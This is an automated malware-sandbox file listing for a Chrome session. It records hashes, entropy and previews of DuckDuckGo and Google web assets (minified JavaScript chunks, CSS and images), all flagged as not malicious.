                                                                                                                                                            SHA1:B231A21FC21C7DFCFF2D1BD2AF222280EC6791EF
                                                                                                                                                            SHA-256:D119DB7E362CB2248AA3B0B21D34B27D88AC94626B52EBFC11A55FD379D1389C
                                                                                                                                                            SHA-512:D07FF2F9F66BA4BE754EDE8259449B9267B85AF77277E5D1F3DA3DFB52627147E35C595A4F3CFB074504D1EE0A2A23E74B4187875BB1B0E98B98AE3A398DFA21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/pages/index-51d8b73bfd4680e3.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[95405],{27955:function(n,u,_){"use strict";_.r(u),_.d(u,{__N_SSG:function(){return r}});var t=_(39040),r=!0;u.default=t.default},89886:function(n,u,_){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return _(27955)}])}},function(n){n.O(0,[41966,43965,49224,81125,53343,36926,62242,49706,20581,84969,56987,4770,69706,49774,92888,40179],(function(){return u=89886,n(n.s=u);var u}));var u=n.O();_N_E=u}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (6397), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):6397
                                                                                                                                                            Entropy (8bit):5.408922325964771
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:bGAIrXgkXEICZsWzrgXLEoBDgfx/idF5TjpuNBLlA4aDG:bBIrQm/53puPLlArG
                                                                                                                                                            MD5:860507FB9A342D3F9194845CA71F8D73
                                                                                                                                                            SHA1:11DE7BADC143F4EBA8FEF855AEEAE3830D53F794
                                                                                                                                                            SHA-256:094AAD1DD938F6C606BB7A4D86C9F031CB01D2B5073CDADA34769454632233BA
                                                                                                                                                            SHA-512:58F740E9315BA9D938306A94877FEF479F6B7FF3B6F01F47A431369120CB0864D98809C7E7024AE3B6C5ED6584EED87429663466170150C9B6247728BD5C64D1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/53343-e1b28b68883ff9df.js
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[53343],{53343:function(e,t,n){n.d(t,{zG:function(){return R},lL:function(){return F}});var i=n(67294),o=n(765),r=n(55152);var u=n(94411),l=n(40884),s=n(61331),a=n(24683),c=n(14921),d=n(58431),f=n(64721);function v(){return v=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e},v.apply(this,arguments)}function E(e,t){if(null==e)return{};var n,i,o={},r=Object.keys(e);for(i=0;i<r.length;i++)n=r[i],t.indexOf(n)>=0||(o[n]=e[n]);return o}var b,p,M,w,h,g,y,L,m=["label","ariaLabel","isVisible","id"],V=["ariaLabel","aria-label","as","id","isVisible","label","position","style","triggerRect"],O=["type"];!function(e){e.Idle="IDLE",e.Focused="FOCUSED",e.Visible="VISIBLE",e.LeavingVisible="LEAVING_VISIBLE",e.Dismissed="DISMISSED"}(y||(y={})),function(e){e.Blur="BLUR",e.Focus="FOCUS",e.GlobalMouseMove="GLOBAL_MOUSE_MOVE",e.M
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):374908
                                                                                                                                                            Entropy (8bit):5.608217900808401
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:HOGc5euRHD0HDXc5KvfIj8Xw19wKetWlY:mHD0HDXc5iInGKetT
                                                                                                                                                            MD5:21481D63D20F1D8BA469CEC6448E83F6
                                                                                                                                                            SHA1:ECC8D18C5FEFFD4EBEEB0FEA97523AE76E5221AE
                                                                                                                                                            SHA-256:D6B8F1881D29CC897F905D9075BA31FD2142E78D06488AD50770861705851259
                                                                                                                                                            SHA-512:6048BD59875CBAA6DBFFA95FF517507861E5FA5DC4ED3BD68A53D1B32DB326A93137012A4A743442AE33D1D8CAD201E956B0E827DDC5B40572ABA46E4564162F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[92888],{25687:function(e,t,r){"use strict";function n(e){return Math.floor(Math.log(e)*Math.LOG10E)}function s(e,t){if("function"===typeof e.repeat)return e.repeat(t);for(var r=new Array(t),n=0;n<r.length;n++)r[n]=e;return r.join("")}function a(e,t,r,n){e.get(t)||e.set(t,Object.create(null)),e.get(t)[r]=n}function o(e,t,r){for(var n=0,s=Object.keys(r);n<s.length;n++){var o=s[n];a(e,t,o,r[o])}}function i(e,t,r){return d(e,t,r)[r]}function d(e,t){for(var r=[],n=2;n<arguments.length;n++)r[n-2]=arguments[n];var s=e.get(t);if(!s)throw new TypeError("".concat(t," InternalSlot has not been initialized"));return r.reduce((function(e,t){return e[t]=s[t],e}),Object.create(null))}function c(e){return"literal"===e.type}function u(e,t,r){var n=r.value;Object.defineProperty(e,t,{configurable:!0,enumerable:!1,writable:!0,value:n})}r.d(t,{$0:function(){return d},LS:function(){return a},Tg:function(){return n},_x:function(){return u},e7:function(
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (29585), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29585
                                                                                                                                                            Entropy (8bit):5.3894735603863015
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:hFCcSTTuOvWpmXNuQHrqTkssSxcAuUnRnPKpRLFQqpy4JQh6OMvLddn47W4:yW4pr5ssSZ/ORpQqpy41ZvTn47W4
                                                                                                                                                            MD5:B3F31042BA387037C853EF354700491C
                                                                                                                                                            SHA1:9FF160C816E4EB8E9320EEEDF0FC3167F63A3021
                                                                                                                                                            SHA-256:085730C8A612D84E53CEAAC1498F6DDB50C95CCE47D439A285D380181E2C6A70
                                                                                                                                                            SHA-512:556B598C8620947D74D6A4CEA364F3B7187D65046DD9F0DAAA66CE083E7FAFC50F09483469DBA718920E4E4F62446AC4A66262EABA0979E9049650B469424179
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[79567],{17732:function(e,l,t){"use strict";t.d(l,{Z:function(){return g}});var a=t(59499),i=t(4730),n=t(61760),r=t(94184),o=t.n(r),c=t(67294),s=t(76743),d=(t(44600),t(70223)),p=t.n(d),f=t(90806),u=t(85893),v=["isOpen","onDismiss","children","overlayClassName","contentClassName","dangerouslyBypassScrollLock","closeOnOverlayClick","dismissable"];function h(e,l){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);l&&(a=a.filter((function(l){return Object.getOwnPropertyDescriptor(e,l).enumerable}))),t.push.apply(t,a)}return t}function m(e){for(var l=1;l<arguments.length;l++){var t=null!=arguments[l]?arguments[l]:{};l%2?h(Object(t),!0).forEach((function(l){(0,a.Z)(e,l,t[l])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):h(Object(t)).forEach((function(l){Object.defineProperty(e,l,Object.getOwnPropertyDescriptor(t,l))}))}return e}function g(e){va
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:assembler source, ASCII text, with very long lines (28564), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28564
                                                                                                                                                            Entropy (8bit):5.147808233513324
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:YYOPLK0/eL2D1y1r/HhpoWBaI/U5W8bEacoJyDVCmr8tIy16FOs8DpcXWDUV6QE/:j0/eL2D1Cs5W8b/b08tS8z
                                                                                                                                                            MD5:D0C58A4171FF52C7475102A79DBD0039
                                                                                                                                                            SHA1:332B7BCAE8AA4F295CC39A8F1134247D26AB5363
                                                                                                                                                            SHA-256:9C663E8833836CC325AD8D1B432D9D5796F36410394DB0A9F47C3FFDDE8355B9
                                                                                                                                                            SHA-512:CAFA7CEB6C451A6A01A7D346A8CCC5F74E28CDAE1FE013BD914E9D6F770CF903981D3168436527774DA8FFDC2D6F39E63F8E5194A1C602050181A3E1A3383553
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.text_text__q9rvO{font-weight:var(--font-weight-normal)}.text_text-weight-heavy__JieKY{font-weight:var(--font-weight-heavy)}.text_text-weight-bold__V8HOo{font-weight:var(--font-weight-bold)}.text_text-weight-semibold__Vtb2c{font-weight:var(--font-weight-semibold)}.text_text-weight-normal__uWnDs{font-weight:var(--font-weight-normal)}.text_text-weight-light__jMKil{font-weight:var(--font-weight-light)}.text_text-xl__Es2Rn{font-size:var(--text-xl);line-height:var(--leading-loose);letter-spacing:var(--tracking-tight)}@media screen and (max-width:850px){.text_text-xl__Es2Rn.text_responsive__9czhp{font-size:var(--text-lg);line-height:var(--leading-relaxed)}}.text_text-lg__wn1El{font-size:var(--text-lg);line-height:var(--leading-relaxed);letter-spacing:var(--tracking-tight)}@media screen and (max-width:850px){.text_text-lg__wn1El.text_responsive__9czhp{font-size:var(--text-md);line-height:var(--leading-normal)}}.text_text-md__x96X3{font-size:var(--text-md);line-height:var(--leading-normal)}@me
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 500x434, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):70484
                                                                                                                                                            Entropy (8bit):7.466837944243974
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:P4lHE53qMKx8OQCiQJK4Xpv8tmRV8ggdETwOhucaVdq:A653qTQFYK4XpEty8ggdE1BaVdq
                                                                                                                                                            MD5:C0124E5D0955F7A3B54685A542404058
                                                                                                                                                            SHA1:8F2D793E13DB772C8A174E05094C600D07917961
                                                                                                                                                            SHA-256:78C595F2D85AB42079072BE35CC7FA8923C9DFA6583E838B81B75133D9D549BF
                                                                                                                                                            SHA-512:B4161685DF4B27F645D41260C3E99EA4C24C108A9173BED119E983FE883508D10D298B5CFA0BBBE1980D3AB50F02B4251CA174A38786ED203071540FEC0B4759
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..#@...O..;}+..o..~c..^..a.?.................GO.v......p......jz....................._.A..........G.E.......|...z.$.._....`.1.Ak..<....1...........x\...=.........$......z........#?..^.`....4.*....x.1...*. @?.....x..n.y.={._....W....'.8......_...{w.........K_....".....s.~.......i>....\...........}G...6....2....~G...ry.t..l;.Z..}?/Q....=z.i.o/...'.}.;...q.\..._.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 275 x 175, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):21446
                                                                                                                                                            Entropy (8bit):7.98188335024922
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:xlzVQ2MS2/W+uoAHTqwaMd+UB512IH8ixnHFWjA/+fuYFnLaqSJlYPdl:OnS2/W+uoeeJMd+UB512IcsB+RFnL82l
                                                                                                                                                            MD5:1C4DBC0C6DF02DB329FDE8F70DEBAED9
                                                                                                                                                            SHA1:A4F329D3058B10016C5A0330D3FE21D3DC1D3EF0
                                                                                                                                                            SHA-256:4FAF7A4B1373606A0517A5E010780E8C6664E92997F38275018BFC0D25FB681C
                                                                                                                                                            SHA-512:E7BB074AFCB3EAAC7FE92ADC6145CCB866E212FF7E475CD21639451EFA161AAAA23C68D43843056E63FD8FF3DDA8619FD9805573CCE09C9A7B10E6E373F35439
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/fitJiqFAG28NoaXMuq1pTd3MD1rHve2lDBvznyV_Orti4UiFSwpCb3_h4n9atBiDDwBXpvUSu8Br2lI1t5UoHnGR=s275-w275-h175
                                                                                                                                                            Preview:.PNG........IHDR.............Q..U....sBIT.....O... .IDATx..w.$.u'.^Df......~.=.. @...EqEi)..v.=....ou...w.......)..H....`....i.|fF..#...*MeUW.. <.......D...K....6.M5.r...6U.zg....T..F...:.....K`0.8.}.r.....(r.}eJu...G.Q............xu2.&Xy.~U...-.6.&Wz.9A.v.4^..km9.....).mr....J......N.>WvT..(7..6.*.m.Xd..X...ue........H..l..K7B.wG+..(*....?w......%+...(XF5"...9.W~`)a.zI".p....\.!r|u..a...n.].e:..*.c..b.r.:...^(.g..oX.{r..o(..I.... .n...*9...]...-..F..~at.........s.j.T)...H..*r<t.....(s.T/..39X.~..B.H..p..+..W...?..E...[..z...GP...U...Sp..R..rm.:...........*.*.JM....A..6U.Z...,I\.\.m.|&9m.<..X..{@ne..zJ....z. ....0S/`...n_....]_^...#.G.C_...:..[F..y.S.`.@...,y#.$..eA.....y.z..B.e.>...[..I.S......x.Z)....N.\#.9[...8.....-y2z0}.&........B...."d.....V)..fm..!g...(BKf...Ti....8}l.....7..y. ..*jW`.TGK.Q.J..+..U...3..4...)u.(.-.N...e....i f.%Lp....x.L........kj...._f.Zi..@....7%~nd.bfu.qa.,...+.....~.G.@..J.F.]d...n.....MXT..B.D...7.~nL......Ul._.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (6397), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6397
                                                                                                                                                            Entropy (8bit):5.408922325964771
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:bGAIrXgkXEICZsWzrgXLEoBDgfx/idF5TjpuNBLlA4aDG:bBIrQm/53puPLlArG
                                                                                                                                                            MD5:860507FB9A342D3F9194845CA71F8D73
                                                                                                                                                            SHA1:11DE7BADC143F4EBA8FEF855AEEAE3830D53F794
                                                                                                                                                            SHA-256:094AAD1DD938F6C606BB7A4D86C9F031CB01D2B5073CDADA34769454632233BA
                                                                                                                                                            SHA-512:58F740E9315BA9D938306A94877FEF479F6B7FF3B6F01F47A431369120CB0864D98809C7E7024AE3B6C5ED6584EED87429663466170150C9B6247728BD5C64D1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[53343],{53343:function(e,t,n){n.d(t,{zG:function(){return R},lL:function(){return F}});var i=n(67294),o=n(765),r=n(55152);var u=n(94411),l=n(40884),s=n(61331),a=n(24683),c=n(14921),d=n(58431),f=n(64721);function v(){return v=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e},v.apply(this,arguments)}function E(e,t){if(null==e)return{};var n,i,o={},r=Object.keys(e);for(i=0;i<r.length;i++)n=r[i],t.indexOf(n)>=0||(o[n]=e[n]);return o}var b,p,M,w,h,g,y,L,m=["label","ariaLabel","isVisible","id"],V=["ariaLabel","aria-label","as","id","isVisible","label","position","style","triggerRect"],O=["type"];!function(e){e.Idle="IDLE",e.Focused="FOCUSED",e.Visible="VISIBLE",e.LeavingVisible="LEAVING_VISIBLE",e.Dismissed="DISMISSED"}(y||(y={})),function(e){e.Blur="BLUR",e.Focus="FOCUS",e.GlobalMouseMove="GLOBAL_MOUSE_MOVE",e.M
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2294
                                                                                                                                                            Entropy (8bit):7.85111683190989
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:lHlFOWrt91bFc9w/8G+IyrF99Da2actS1FBKu1E4XTnoia8u:TF1t95FSw0X135tS17Ku1rDLa8u
                                                                                                                                                            MD5:49A6ECEE696747FC520E9BA12B3F250E
                                                                                                                                                            SHA1:AE6E7796652CF2B6CAC0FE3DFF8FBF570FD43848
                                                                                                                                                            SHA-256:63BF380C511EDE464AB2BD48BBFB16B492A92091428240CE9C2A06AB84182DA2
                                                                                                                                                            SHA-512:6D86173C9C48BAC353D2559893C1F894ACFFF4BC68F7D2EC11F949C681CE2966E101A65487EF65B807F4EC6DD1EF7C47820D6048F2172730F00BFB19B5364242
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/wYdux_M8NF9FTg2fLMt5TQdGmR1zHmI5XCaJAmn8L9OpWiph0uP5kEpeylM_XgR-OzJgZDcTV_sx-6INdNwHha5-FHY=s60
                                                                                                                                                            Preview:.PNG........IHDR...<...<.....:..r....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2...BIDATh..ZkLT..~...0.\.X...`0..MM.....E..&J......R.H.`.-.6K.E)...51.n.Q....A.v7....Q .S[@..3....q.278.?.I..s...>.....;...8.....7`,%......9..M.n...w.....G..=...4.);U.......0#.8..%.....0a%.l.ONN..c.........g.........<......f...`....xcc.OTT..3g..jjj.d...iii...ASS........$&&^.....d......0..Y..\cL....<x...%##.O....2.h.7:.....,{.$<~.....Lv.`0...3Y.^.@....Jk...,1.......x..9997a$l...b..K....E....A.V.......W[]]..D".,((..F...>}.....Bg.....|*...LHH(.......^.....O...]..?<<.^VVV......K.....,....3..mqqq.#G..0QRR..v..p.B.[.|a.$..giCnn...>.%.Z.......*........5<.oH,.....g%$$....=...:L:.."...@.t.\\\.....R............0...7.....0.......`...gG9K..%%%...Y..H$.u......oNKKSdff~..c6.m..c[.l......=.....k ....7.....2....qww.W..........t....]......L...MMM-...t.....R..;w.|fC^w.a.D".I..z..|F.m....1.L.....+W.....tE^^^...'C..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1501
                                                                                                                                                            Entropy (8bit):7.8069101365699645
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:USLpWnM5lXW9bsk9bcq1/1v3a9PnPvef6bqiq8eGaa3dpYdXMI8SPk/NIz:UuWM5l/ktc0heHpbY8zKuIDk/NIz
                                                                                                                                                            MD5:75D78A3233B5E0672F48247200DECDB0
                                                                                                                                                            SHA1:DA7E8B9DB98A6950D1637B4DD5E098FA2EC3A02A
                                                                                                                                                            SHA-256:E136AE509E08AC00FB264CB82CFA1081982DDCF775EE058B201FABBCC59B7C8A
                                                                                                                                                            SHA-512:78101831843340D55A22DE928677FCDBC20A66FABB7CF8BC9961EE7AD334286E0C2FF3A10B09785BD84854ED511C6931A2A7CD0E0810C18ADF526EF3619697F0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://ssl.gstatic.com/chrome/webstore/images/icon_48px.png
                                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......sBIT....|.d.....pHYs...v...v.}......tEXtSoftware.www.inkscape.org..<....ZIDATh..]l.U...wf?..K.B[.+..5 jL..h./.F......G...E|V.4"P.....|0.D.%(..U....-.nk.....3;.v..1...C.&=.f.{.9.....sg....,.l......m...<.COO..nv{.../....# ...R.7.q.).)4..VO.b.....VUU.V!G`:...8'.xw....G..../K).M9.r.UTT..u.. .....|.....EQ&.|S.c...'.T.x<..}<...d^u#.0s.\.p*..#...\WWWX...+`...7e._%.+..(..+`'3u.._.+...k... .g.....$.P.#..@Y.B..F.Bx.......+q.U........i..;.....{.Ej.g.J<..b.C..wrq.....tww;' %.I}u.#._.R.._.W.TQ.y+.....B'.$....H&.....>.~........(-..[d...7......jG{(..M...v....`..Z!..\..'..+Y.s....'.....}..u....o.P=,x.E|.lrD..1......i6...x.D..#..._lu.mb.F...}.G...^..Q|.R.....F.o.ae.H$.....|....23.h.....A..y.&]..8....=..[./.i..g..h#...r..+q:....k..,...!..y.L...B.T..Y.....6,.T'j....Js...F.R9C...X.;[.G......x..n.....j.j....S....)..1.E.rCo.j...X..*.0....#.#p..\E...<z.*..).x.B`.6...b...VA[/t........k....<...H..2......#.K.r..5.F...C|..0
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16939
                                                                                                                                                            Entropy (8bit):7.970774919746986
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:1TpjNTaqP9/D89ltNYElf/eZmT/gCvfeOkPmH8CwTdHAf:DjNTaGBc/eZmDgCvfWmLwTdo
                                                                                                                                                            MD5:C03246ACB6A2736F4404FADD86BD7100
                                                                                                                                                            SHA1:E9005AEFEF550076C87D1930FEABD346DF00F874
                                                                                                                                                            SHA-256:AF859DB11244C077F3C07EA7E7F779C2F5F2E0676C56603434FE6A61AA751D59
                                                                                                                                                            SHA-512:217D578DA0C949A0A1773328C86D6BABEAF5A0730D4762B8DCD1D162B01CDA14CE261A1E33187D9BBA0AFF678E0795FD04206BB26D5102AE520002FEE31E76E5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...A.IDATx..]..U...}o*.. ...@.A..i.@E.%......MLQ#..fW...EE1k[......V...&0.E...m:3..g...{.R......w.}..{.......-.B-.B-.B-.B-.B-.B-.....?.5k..]z..}?.....j.......,....w'..hd.(dh.|.MII.......D...1......u.9...g....=........?_........wD.z.@.. .'%%.AF.HKK...222.....xbrC....?t....///g...%...k.}>...o.@|+...>._.D..YYY.m...l...c..0#.W..y.A...W...{<.....BYY.....(.3Q.....5..L'.}.2dR...I.i#Rf..G..2)`.Bm...}....N....8p@.C,...m$.;.[@'....c.?.U.Q.;v..[.....o'*..(,.b+S.e5.U..''......k..W..v`.:..........$......m..'....c.l....:p..F......k..}-.....9qH~..:..?.?.g6V^.N.!.....`Xw.2S.%..@..Z..g...bl.r...I'......6..>Z.-/....>#.o*6G*K..../...... V..... \z..C.1.......). A())!A..ds.'..(.. ..I].t....._..#f...s6.h............Y.`.v.x...p..VZ!.../.[..Y.....M....$.p...r#<p1....\..E.N..@.......z.w.P..ZY....L'....Lv... ......A.=...t..0nN..7.q......A4..nB0z.[Q.e+(O/...U..\.. \.....`EX....}.v.....4h
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 865 x 1220, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):105834
                                                                                                                                                            Entropy (8bit):7.970978172299477
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:afxetbIBkGMBobU2oJcdd8PhLaceeprf82:afxetdBkqcihLqMT
                                                                                                                                                            MD5:81C041E5DC29D7DC9D16CD7C8E725A24
                                                                                                                                                            SHA1:B9B5C6B0D5B46C991A2078073CA8DAAC88DFAA84
                                                                                                                                                            SHA-256:B8ED057550F8D1298E616296823662A6331DE234D77FD6A8DB5C421343D043CC
                                                                                                                                                            SHA-512:DD9281351CF76964CC63679C61FFA3C1E317593C832AB71D41C9489B7B658F0F5FB608F6C8BA5A32513FA1FCC9F2389DFBCBC3DA3D5EFD90139A8B1D69E4EF4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...a................PLTE...###................................................kkk.............................................................y{.}~...""".{}....wy....xz.......tv................rt................>>>....os.......YYY...".......&....9i....uuu!..&..*..-..2".111.........7'#<+'....x..nr....ur.sodUR$..A0,+..3...pm..._PM.@8...D-%H63jYW..J2)...?'.2..KKK9#......XIFo^\M=:fffQ7/4.SSC@..moB...yw{jh....|ztdb.......}...<.........X>6.wsNy.cd.uv...........F%.....ii....]^...ooo.....aF?.WW.......................^^^......{??^..?.~l66.OP{.....gOI...|||......GH..R0 ......yr7e....P&%..xZSj..[7'.qiQQQ..}qRI.aZ.........i`............h@-....lm|L2...3].....z.rp.O^@.#^......ku...h.R.Z=........wu....k..P=Y#..\Pn.....~.wJ.].uMq...#......>..../...p.S.F..g....$tRNS.......!%m+@29n.".(.y.G9.WP.c.ssuq........IDATx.........................................................................`...9a...}..t.pf....@d.W..X.k..`.1..c.1..c.1.T./c..w.4..&Q.iC..'.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (2287)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):215740
                                                                                                                                                            Entropy (8bit):5.527047079967629
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:OefBBvl6JIOuAeUJt7PinfKrB08+p5jDFVv+t/M1mFUpvuRAlEPaz4JCmE+onSL6:Oevvl6JIOuAeUJt7PinfKrB08+p5jDF3
                                                                                                                                                            MD5:C4C96B55CD145594ECCCDADDCE3CF3F9
                                                                                                                                                            SHA1:0351F5268EA95E26246267757183CA4606DAB090
                                                                                                                                                            SHA-256:A32A92D0A2AACC630119B5CE8895AD5B70B5C725397165E68F418FB0050C51A1
                                                                                                                                                            SHA-512:0D003531FC8C9C46AE3C65DDB49ADCF5868A9EDE509B0B1AF6A91BE5BFBF50271D992A24203036EC688CD5266E7A9A751AE96D7B62289F1E206CAB99E8D02E68
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.eBPYdy5TlKU.2019.O/rt=j/m=qabr,q_dnp,qcwid,qapid,qads,q_dg/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/rs=AA2YrTvCjRZ-bRAiOPLLf0QdNwYcTlfNSg"
                                                                                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{.var He;He=0;_.Ie=function(a){return Object.prototype.hasOwnProperty.call(a,_.Qb)&&a[_.Qb]||(a[_.Qb]=++He)};_.Je=function(a){return _.Pb(a)&&a.nodeType==1};_.Ke=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.Ee(a),a.appendChild(_.te(a).createTextNode(String(b)))};var Le;_.Me=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;c===""||c==void 0?(Le||(Le={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Le,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Qe;_.Pe=function(a,b,c,d,e,f){if(_.qc&&e)return _.Ne(a);if(e&&!d)re
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):509
                                                                                                                                                            Entropy (8bit):6.1460160814912586
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:6v/7S//4SqMDuaqqqqq1IBc4Y1HFqqqqq7lPl7:vqaU4UOl7
                                                                                                                                                            MD5:95877C3F0436A0C14803D7908D2C5041
                                                                                                                                                            SHA1:8E7A18EFA4C1853DAA5C9C7E5CE5FCF91381702E
                                                                                                                                                            SHA-256:AC420C082866099FF585E804FE2B2EA67E77EA7B3B960DAD3200103E5638144C
                                                                                                                                                            SHA-512:8C22FFCF6385D2EFAE52A25F51E2147DD59044947E8D601717634F7654B8E0E34F124C8E0F09647BA6DF590D268C80A4B1741A48FD5D75473EBDA62E33A73029
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/windows.477fa143.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...!N.Q.@..A .l...K.........g.....Be...M.9................8..}7&o7....h...s;^..-.Oz..4... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....w3N......[..}...f......gl..o...!p..y0[|...yL..6.?...p.....i.u4{..k;... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8.......\.o....9..J....IEND.B`.
